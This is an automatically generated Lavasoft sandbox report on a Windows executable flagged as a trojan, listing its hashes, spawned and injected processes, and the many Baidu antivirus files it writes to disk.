Gen:Trojan.Heur.JP.bq0@aW98Nwnb (AdAware), Trojan.Win32.Alureon.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 6653a00161a58061f2e6bc283de8edee
SHA1: 70db6bbf6945e4d9c8088678a710b5b72d9ecd28
SHA256: bc1799830b131d74e3dc0db5bf4b22dd574474926544434e7cfd727d8798b4fb
SSDeep: 12288:HRWNcr8oxn/1CSbCqMPFROvw8Y8KRFe4CO uJyx/VX6WbODE28Ydq9TyoNHTaW5e:gNBI5/VNbOQ2s9TdHe1pb8c
Size: 813662 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: AirInstaller
Created at: 2013-12-01 10:08:23
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
F1023_s_30803.exe:780
BaiduHips.exe:3260
BaiduHips.exe:320
netsh.exe:2640
BDKVWsc.exe:2568
BDKVWsc.exe:2668
RegSvr32.exe:2972
RegSvr32.exe:2256
RegSvr32.exe:560
RegSvr32.exe:1232
RegSvr32.exe:2360
bddownloader.exe:2600
bddownloader.exe:3792
G1023_s_70904.exe:3576
%original file name%.exe:716
BaiduSdTray.exe:2844
BaiduAnTray.exe:3824
setup.exe:1056
cacls.exe:1860
MsiExec.exe:548
MsiExec.exe:1968
BaiduAnBugRpt.exe:916
BDASWDeskGuide.exe:228
baiduanTray.exe:3012
BindEx.exe:1568
BindEx.exe:1040
setup.tmp:1976
regsvr32.exe:2652
regsvr32.exe:1520
regsvr32.exe:2920
BDALeakfixer.exe:3188
BaiduAn.exe:3824
BaiduAn.exe:1952
BaiduSdBugRpt.exe:2180
BaiduSdUpdate.exe:2680
BaiduSdUpdate.exe:2228
BaiduAnSvc.exe:3768
BaiduAnSvc.exe:3664
BaiduSdSvc.exe:1500
The Trojan injects its code into the following process(es):
bddownloader.exe:3300
services.exe:724
svchost.exe:1084
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process F1023_s_30803.exe:780 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMPatchAgent.dll (3104 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDUDiskGuard.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerXMLScript.dat (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ad.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSd.exe (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\res\InstallWnd.zip (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDCooly.dll (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVMC.rdb (5520 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_customer.xml (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\tips.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\TrustAndIso.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDDownLoadProtectPlugin.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_self_enc.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\wverify.dat (15019 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsUpdate.exe (37 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ToastLogo.ico (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\vcrt.msi (22552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDPerflog.dll (10512 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMStringUtils.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BSRLib.dat (5064 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bdcomproxy.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDLogicUtils.dll (16864 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\811.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp (1287722 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\NetService.ini (615 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\baidusdRepair.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVRmvDevPlugin.dll (8560 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe (9605 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUProxy64.exe (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVEng.dll (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTray\TrayPlugin.rdb (18424 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDDriverFixer.dll (1281 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMNet.dll (5873 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsIU.dll (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSREng.dll (10136 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\CompatibilityChecker.dll (673 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\bdcomproxy.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMPatchAgent.dll (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\UserDetectionPlugin.dll (5520 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\systemfile.dat (3 bytes)
%System%\config (576 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\806.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUpdate.exe (7385 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\HIPSClient.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMWindowsLib.dll (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDPerflog.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\monitor_config.dat (559 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0001.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDKitUtils.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDMWrench.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0001.dll (4992 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\Repair_PluginConfig.xml (411 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVRtp_PluginConfig.xml (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\virus_type.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\bduf.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\TrayPluginContainerConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\810.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdUpdate.exe (33263 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVWsc.exe (13368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\GetSupplyId.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0002.sys (13168 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavFrame.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect_x64.dll (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0001.sys (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMWindowsLib.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMLog.dll (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDLogicUtils.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\TrustAndIso.dll (13440 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHips.exe (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanV.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ToastLogo.ico (12024 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\blacksign.dat (852 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vatl.msi (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\repairplugins\RepairPluginContainerConfig.xml (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSRCore.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVFixerConfigMgr.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\804.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebMonHook.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\InstallCfg.xml (177 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0002.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GameNoDisturb.ini (215 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\uninst.exe (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsIU.dll (1856 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMTinyXml.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDUDiskGuard.dll (7192 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\tuopan.png (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMStringUtils.dll (63 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0001.sys (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDPerflog.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_self_enc.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\RtpContainerConfig.xml (818 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\806.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMDownload.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDLogicUtils.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\TrustAndIso.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMFrameWork.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDShellExt64.dll (2321 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_customer.xml (75 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\cache_config.dat (469 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\wverify.dat (15019 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSd.exe (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMSDWrench.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDeskBand.dll (5064 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMFrameWork.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\NetService.ini (1230 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayDldProtect.rdb (3616 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0001.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMPatchAgent.dll (39 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\PrivacyProtect.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\BDMSkin.dll (37727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHips.exe (38495 bytes)
%System%\config\system (2566 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\KVInstallHelper.dll (16424 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\white_list.dat (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVUpdate.rdb (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\901.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\blacksign.dat (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ToastImage.png (5 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch.7z (7433 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerLuaScript.dat (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDLogicUtils.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDArKit.sys (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerConfig.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVCached.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMNet.dll (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdvs.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanH.dll (1856 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdmp.dat (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\updlog.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\kav_verify.dat (677 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\NetService.ini (615 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vcrt.msi (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMSkin.dll (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\RtpContainerConfig.xml (818 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDDownLoadProtectPlugin.dll (16288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVCached.dll (23584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSREng.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\monitor_config.dat (559 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\NetService.ini (615 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdBugRpt.exe (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerConfig.dat (1 bytes)
%Documents and Settings%\All Users\Desktop\百度æÂ€毒.lnk (895 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDArKit.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\dl.dll (14988 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsBugRpt.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebMonHook.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVMainframe_PluginConfig.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMDownload.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\systemfile.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\vatl.msi (6584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCCallbackBind.dll (39 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\Cooly_PluginConfig.xml (726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSDWrench.dll (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\DesktopToast.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMRepMgr.dll (12088 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMTinyXml.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdSvc.exe (27704 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\coolyplugins\CoolyContainerConfig.xml (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVTrayTipsPlugin.dll (6584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMUpdate.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayPullUpWS.rdb (3616 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMScriptVM.dll (1281 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVVirusPlugins.dll (12088 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\KavUpdate.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\RepairPluginContainerConfig.xml (228 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\Database\bdmp.dat (32 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\kav_verify.dat (677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVRtp_PluginConfig.xml (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanH.dll (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebSafePlugin.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\uninst.exe (29256 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayPlugin.rdb (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0003.sys (1856 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMPatchAgent.dll (43 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_self_enc.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMDbSqlite.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\duilib license.txt (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMLog.dll (43 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDConfig.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTray.rdb (1552 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\TrustAndIso.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\CoolyContainerConfig.xml (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\fm.dat (597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DriverManager.dll (8608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\white_list.dat (12088 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsIU.dll (55 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTips.rdb (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsBugRpt.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdUProxy64.exe (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanS.dll (2392 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\900.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\Cooly_PluginConfig.xml (726 bytes)
%System%\drivers\bd0003.sys (55 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\systemfile.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVTrayTipsPlugin.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMBase.dll (7345 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCScriptBind.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\FileMon.dll (21216 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\placeholder_tmp (11 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\7z.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\DriverManager.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKitUtils.dll (2392 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\dl.dll (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMUpdate.dll (12104 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKV.rdb (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\DllInject.dll (43 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\iexplore.exe.xml (528 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\809.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\dl.dll (65930 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\smr.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\SearchProtection.rdb (5064 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\tuopan.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDShellExt.dll (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMDownload.dll (15336 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanM.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVMainframe_PluginConfig.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0001.sys (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\scan_mgr_config.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDShellExt64.dll (15168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\placeholder_tmp (11 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\ccesign.dat (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMMsg.dll (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVQuarantine.rdb (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\virus_type.dat (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVCached.dll (1425 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度æÂ€毒\百度æÂ€毒.lnk (907 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMBase.dll (7345 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMMsg.dll (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0002.dll (16424 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMUpdate.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanM.dll (2392 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMEvents.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\wverify.dat (132336 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand64.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\TrayPluginContainerConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GameNoDisturb.ini (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\900.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDConfig.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVRecomm.dll (13122 bytes)
%System%\drivers\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMLog.dll (43 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMReport.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BSRLib.dat (673 bytes)
%System%\config\SYSTEM.LOG (5938 bytes)
%System%\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMBase.dll (32128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCCallbackBind.dll (1552 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度æÂ€毒\å¸载百度æÂ€毒.lnk (880 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCScriptBind.dll (32128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\PrivacyProtect.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\iexplore.exe.xml (528 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDownloadProtect.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\directui license.txt (593 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkv\KVMainframePluginContainerConfig.xml (384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\HIPSClient.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDownloadProtect_x64.dll (6360 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\tips.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdRepair.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\putips_wording.dat (580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVRecomm.dll (58402 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\InstallCfg.xml (177 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\cache_config.dat (469 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\KVCommonRes.rdb (131925 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebSafe.dll (7547 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0002.sys (673 bytes)
